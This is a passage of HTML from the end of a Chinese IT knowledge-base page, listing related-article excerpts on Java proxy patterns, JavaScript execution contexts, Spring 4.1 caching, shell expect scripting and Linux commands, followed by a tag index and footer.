	'items'=&gt;$this-&g</div>
                                </li>
                                <li><a href="/article/2800.htm"
                                       title="设计模式之静态代理与动态代理" target="_blank">设计模式之静态代理与动态代理</a>
                                    <span class="text-muted">come_for_dream</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>静态代理与动态代理 
 &nbsp; &nbsp;&nbsp;&nbsp;&nbsp; 代理模式是java开发中用到的相对比较多的设计模式，其中的思想就是主业务和相关业务分离。所谓的代理设计就是指由一个代理主题来操作真实主题，真实主题执行具体的业务操作，而代理主题负责其他相关业务的处理。比如我们在进行删除操作的时候需要检验一下用户是否登陆，我们可以删除看成主业务，而把检验用户是否登陆看成其相关业务</div>
                                </li>
                                <li><a href="/article/2927.htm"
                                       title="【转】理解Javascript 系列" target="_blank">【转】理解Javascript 系列</a>
                                    <span class="text-muted">gcc2ge</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>理解Javascript_13_执行模型详解 
 
  摘要: 在《理解Javascript_12_执行模型浅析》一文中,我们初步的了解了执行上下文与作用域的概念，那么这一篇将深入分析执行上下文的构建过程，了解执行上下文、函数对象、作用域三者之间的关系。函数执行环境简单的代码:当调用say方法时，第一步是创建其执行环境，在创建执行环境的过程中，会按照定义的先后顺序完成一系列操作:1.首先会创建一个</div>
                                </li>
                                <li><a href="/article/3054.htm"
                                       title="Subsets II" target="_blank">Subsets II</a>
                                    <span class="text-muted">hcx2013</span>
<a class="tag" taget="_blank" href="/search/set/1.htm">set</a>
                                    <div>Given a collection of integers that might contain duplicates,&nbsp;nums, return all possible subsets. 
Note: 
 
 Elements in a subset must be in non-descending order. 
 The solution set must not conta</div>
                                </li>
                                <li><a href="/article/3181.htm"
                                       title="Spring4.1新特性——Spring缓存框架增强" target="_blank">Spring4.1新特性——Spring缓存框架增强</a>
                                    <span class="text-muted">jinnianshilongnian</span>
<a class="tag" taget="_blank" href="/search/spring4/1.htm">spring4</a>
                                    <div>目录 
Spring4.1新特性——综述 
Spring4.1新特性——Spring核心部分及其他 
Spring4.1新特性——Spring缓存框架增强 
Spring4.1新特性——异步调用和事件机制的异常处理 
Spring4.1新特性——数据库集成测试脚本初始化 
Spring4.1新特性——Spring MVC增强 
Spring4.1新特性——页面自动化测试框架Spring MVC T</div>
                                </li>
                                <li><a href="/article/3308.htm"
                                       title="shell嵌套expect执行命令" target="_blank">shell嵌套expect执行命令</a>
                                    <span class="text-muted">liyonghui160com</span>

                                    <div>&nbsp; 
&nbsp; 
一直都想把expect的操作写到bash脚本里,这样就不用我再写两个脚本来执行了,搞了一下午终于有点小成就,给大家看看吧. 
&nbsp; 系统:centos 5.x 
&nbsp; 
1.先安装expect 
yum -y install expect 
&nbsp; 
2.脚本内容: 
cat auto_svn.sh 
&nbsp; 
#!/bin/bash
</div>
                                </li>
                                <li><a href="/article/3435.htm"
                                       title="Linux实用命令整理" target="_blank">Linux实用命令整理</a>
                                    <span class="text-muted">pda158</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>0. 基本命令   　　linux 基本命令整理   　 
　1. 压缩 解压   　　tar -zcvf a.tar.gz a &nbsp; #把a压缩成a.tar.gz   　　tar -zxvf a.tar.gz &nbsp; &nbsp; #把a.tar.gz解压成a   　 
　2. vim小结   　　2.1 vim替换   　　:m,ns/word_1/word_2/gc &nbsp</div>
                                </li>
                                <li><a href="/article/3562.htm"
                                       title="独立开发人员通向成功的29个小贴士" target="_blank">独立开发人员通向成功的29个小贴士</a>
                                    <span class="text-muted">shoothao</span>
<a class="tag" taget="_blank" href="/search/%E7%8B%AC%E7%AB%8B%E5%BC%80%E5%8F%91/1.htm">独立开发</a>
                                    <div>  
 概述：本文收集了关于独立开发人员通向成功需要注意的一些东西,对于具体的每个贴士的注解有兴趣的朋友可以查看下面标注的原文地址。  
   
 
 明白你从事独立开发的原因和目的。 
 保持坚持制定计划的好习惯。 
 万事开头难，第一份订单是关键。 
 培养多元化业务技能。 
 提供卓越的服务和品质。 
 谨小慎微。 
 营销是必备技能。 
 学会组织，有条理的工作才是最有效率的。 
 “独立</div>
                                </li>
                                <li><a href="/article/3689.htm"
                                       title="JAVA中堆栈和内存分配原理" target="_blank">JAVA中堆栈和内存分配原理</a>
                                    <span class="text-muted">uule</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>1、栈、堆  
1.寄存器：最快的存储区, 由编译器根据需求进行分配,我们在程序中无法控制.2. 栈：存放基本类型的变量数据和对象的引用，但对象本身不存放在栈中，而是存放在堆（new 出来的对象）或者常量池中（字符串常量对象存放在常量池中。）3. 堆：存放所有new出来的对象。4. 静态域：存放静态成员（static定义的）5. 常量池：存放字符串常量和基本类型常量（public static f</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>